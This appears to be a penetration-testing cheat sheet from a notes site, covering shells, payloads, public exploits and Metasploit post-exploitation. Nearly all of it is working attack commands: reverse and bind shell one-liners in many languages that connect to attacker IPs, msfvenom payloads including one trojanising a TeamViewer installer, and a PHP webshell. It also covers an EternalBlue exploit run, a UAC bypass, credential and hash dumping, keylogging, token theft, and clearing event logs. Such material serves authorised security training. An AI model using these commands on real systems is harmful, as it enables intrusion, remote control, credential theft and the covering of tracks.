Shells, Payloads & Exploit

Shells and Payloads

# Netcat Bind Shell
nc -nlvp 4444 -e cmd.exe
nc -nv 10.11.0.22 4444
# Netcat Reverse Shell
rlwrap nc -nlvp 4444
nc -nv 10.11.0.22 4444 -e /bin/bash

# Different commands used to get reverse shell : https://www.revshells.com
Bash   : bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
SH     : rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
Python : python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP    : php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
PERL   : perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Netcat : nc -e /bin/sh 10.0.0.1 1234
Netcat : rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Ruby   : ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Powershell : powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Java   :
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

# Start a bind shell on the remote server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

# Different commands used to spawn an interactive shell on a linux-based system
Python : python -c 'import pty; pty.spawn("/bin/sh")'
Sh     : /bin/sh -i
Perl   : perl —e 'exec "/bin/sh";'
Ruby   : ruby: exec "/bin/sh"
Lua    : Lua: os.execute('/bin/sh')
awk    : awk 'BEGIN {system("/bin/sh")}'
find   : find / -name nameoffile 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
find   : find . -exec /bin/sh \; -quit
vim    : vim -c ':!/bin/sh'

# Upgrade shell TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z 
stty raw -echo;fg
<enter><enter>
reset
xterm

# Socat Reverse Shells
socat -d -d TCP4-LISTEN:443 STDOUT
socat TCP4:10.11.0.22:443 EXEC:/bin/bash

# Socat Encrypted Bind Shells
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
socat - OPENSSL:10.11.0.4:443,verify=0

# Powercat Reverse Shells
sudo nc -lvp 443
powercat -c 10.11.0.4 -p 443 -e cmd.exe

# Powercat Bind Shells
powercat -l -p 443 -e cmd.exe
nc 10.11.0.22 443

# Powercat Stand-Alone Payloads
powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1
./reverseshell.ps1

# Creating a stand-alone encoded Base64 payload
powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
powershell.exe -E "Base64 encoded payload"

# MSFvenom command used to generate a linux-based reverse shell stageless payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf

# MSFvenom command used to generate a Windows-based reverse shell stageless payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > rev.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe -o rev.exe

# MSFvenom command used to generate a MacOS-based reverse shell payload
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho

# MSFvenom command used to generate a ASP web reverse shell payload
msfvenom -p windows/<meterpreter>/reverse_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp

# MSFvenom command used to generate a JSP web reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp

# MSFvenom command used to generate a WAR java/jsp compatible web reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war

# Create a webshell php file
echo "<?php system(\$_GET["cmd"]);?>" > /var/www/html/shell.php

# Location of laudanum webshells on ParrotOS and Pwnbox
/usr/share/webshells/laudanum
# Location of Antak-Webshell on Parrot OS and Pwnbox
/usr/share/nishang/Antak-WebShell

Public Exploits

# Online
https://www.exploit-db.com
https://packetstorm.news
https://github.com
# Offline
Metasploit
searchsploit
/usr/share/nmap/scripts/

# Search for public exploits for a web application
searchsploit openssh 7.2

# MSF: Search for public exploits in MSF
search exploit eternalblue

# MSF: Start using an MSF module
use exploit/windows/smb/ms17_010_psexec

# MSF: Show required options for an MSF module
show options

# MSF: Set a value for an MSF module option
set RHOSTS 10.10.10.40

# MSF: Test if the target server is vulnerable
check

# MSF: Run the exploit on the target server is vulnerable
exploit

Cross-Compiling Exploit Code

# Compiling exploit for windows target
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
# run exploit with wine in linux
sudo wine syncbreeze_exploit.exe
# Packing chishel with upx
upx brute chisel
# Convert Python exploit to a binary file
pyinstaller.exe --onefile .\41090.py

Metasploit Framework

# Create and initialize the database
sudo msfdb init
# Enable PostgreSQL
sudo systemctl enable postgresql
# Confirming the connexion 
msf6 > db_status

MSFVenom

# Generating Payload
msfvenom -p windows/<meterpreter>/reverse_tcp LHOST=<IP> LPORT=1337 -f aspx > reverse_shell.aspx
msfvenom -p linux/x64/<meterpreter>/reverse_tcp LHOST=<IP> LPORT=8080 -f elf -o backupjob 

# Generating Payload - With Encoding
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai

# starting a listener on msfconsole
msf6 > use multi/handler

# Privilege Escalation
use post/multi/recon/local_exploit_suggester

# Embed payloads into any executable
msfvenom windows/x86/<meterpreter_reverse_tcp> LHOST=<IP> LPORT=8080 -k -x TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o TeamViewer_Setup.exe -i 5

Post-Exploitation

# Display idle time from current user
meterpreter > idletime
# Elevate permissions to NT AUTHORITY\SYSTEM
# Check if we have SeImpersonatePrivilege or SeDebugPrivilege
whoami /priv
# Elevate our privileges with getsystem
meterpreter > getsystem
meterpreter > getuid
# Migrate into explorer.exe
meterpreter > ps
meterpreter > migrate <PID>
# If we dont find a process to migrate to we can create a new process
meterpreter > execute -H -f notepad
meterpreter > migrate <PID>
# Elevate our shell to a high integrity level by bypassing UAC
# Verifiying the integrity level
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
# Bypass UAC
search UAC
use exploit/windows/local/bypassuac_sdclt
# Load Kiwi module and execute creds_msv to retrieve credentials
meterpreter > load kiwi
meterpreter > creds_msv

MSFconsole Commands

Command

Description

show exploits

Show all exploits within the Framework.

show payloads

Show all payloads within the Framework.

show auxiliary

Show all auxiliary modules within the Framework.

search <name>

Search for exploits or modules within the Framework.

info

Load information about a specific exploit or module.

use <name>

Load an exploit or module (example: use windows/smb/psexec).

use <number>

Load an exploit by using the index number displayed after the search command.

LHOST

Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.

RHOST

The remote host or the target. set function Set a specific value (for example, LHOST or RHOST).

setg <function>

Set a specific value globally (for example, LHOST or RHOST).

show options

Show the options available for a module or exploit.

show targets

Show the platforms supported by the exploit.

set target <number>

Specify a specific target index if you know the OS and service pack.

set payload <payload>

Specify the payload to use.

set payload <number>

Specify the payload index number to use after the show payloads command.

show advanced

Show advanced options.

set autorunscript migrate -f

Automatically migrate to a separate process upon exploit completion.

check

Determine whether a target is vulnerable to an attack.

exploit

Execute the module or exploit and attack the target.

exploit -j

Run the exploit under the context of the job. (This will run the exploit in the background.)

exploit -z

Do not interact with the session after successful exploitation.

exploit -e <encoder>

Specify the payload encoder to use (example: exploit –e shikata_ga_nai).

exploit -h

Display help for the exploit command.

sessions -l

List available sessions (used when handling multiple shells).

sessions -l -v

List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.

sessions -s <script>

Run a specific Meterpreter script on all Meterpreter live sessions.

sessions -K

Kill all live sessions.

sessions -c <cmd>

Execute a command on all live Meterpreter sessions.

sessions -u <sessionID>

Upgrade a normal Win32 shell to a Meterpreter console.

db_create <name>

Create a database to use with database-driven attacks (example: db_create autopwn).

db_connect <name>

Create and connect to a database for driven attacks (example: db_connect autopwn).

db_nmap

Use Nmap and place results in a database. (Normal Nmap syntax is supported, such as –sT –v –P0.)

db_destroy

Delete the current database.

db_destroy <user:password@host:port/database>

Delete database using advanced options.

Meterpreter Commands

Command

Description

help

Open Meterpreter usage help.

run <scriptname>

Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory.

sysinfo

Show the system information on the compromised target.

ls

List the files and folders on the target.

use priv

Load the privilege extension for extended Meterpreter libraries.

ps

Show all running processes and which accounts are associated with each process.

migrate <proc. id>

Migrate to the specific process ID (PID is the target process ID gained from the ps command).

use incognito

Load incognito functions. (Used for token stealing and impersonation on a target machine.)

list_tokens -u

List available tokens on the target by user.

list_tokens -g

List available tokens on the target by group.

impersonate_token <DOMAIN_NAMEUSERNAME>

Impersonate a token available on the target.

steal_token <proc. id>

Steal the tokens available for a given process and impersonate that token.

lsa_dump_sam

Dumping SAM

lsa_dump_secrets

Dumping LSA secrets

drop_token

Stop impersonating the current token.

getsystem

Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.

shell

Drop into an interactive shell with all available tokens.

execute -f <cmd.exe> -i

Execute cmd.exe and interact with it.

execute -f <cmd.exe> -i -t

Execute cmd.exe with all available tokens.

execute -f <cmd.exe> -i -H -t

Execute cmd.exe with all available tokens and make it a hidden process.

rev2self

Revert back to the original user you used to compromise the target.

reg <command>

Interact, create, delete, query, set, and much more in the target’s registry.

setdesktop <number>

Switch to a different screen based on who is logged in.

screenshot

Take a screenshot of the target’s screen.

upload <filename>

Upload a file to the target.

download <filename>

Download a file from the target.

keyscan_start

Start sniffing keystrokes on the remote target.

keyscan_dump

Dump the remote keys captured on the target.

keyscan_stop

Stop sniffing keystrokes on the remote target.

getprivs

Get as many privileges as possible on the target.

uictl enable <keyboard/mouse>

Take control of the keyboard and/or mouse.

background

Run your current Meterpreter shell in the background.

hashdump

Dump all hashes on the target. use sniffer Load the sniffer module.

sniffer_interfaces

List the available interfaces on the target.

sniffer_dump <interfaceID> pcapname

Start sniffing on the remote target.

sniffer_start <interfaceID> packet-buffer

Start sniffing with a specific range for a packet buffer.

sniffer_stats <interfaceID>

Grab statistical information from the interface you are sniffing.

sniffer_stop <interfaceID>

Stop the sniffer.

add_user <username> <password> -h <ip>

Add a user on the remote target.

add_group_user <"Domain Admins"> <username> -h <ip>

Add a username to the Domain Administrators group on the remote target.

clearev

Clear the event log on the target machine.

timestomp

Change file attributes, such as creation date (antiforensics measure).

reboot

Reboot the target machine.

PreviousFile TransfersNextWeb Enumeration

Last updated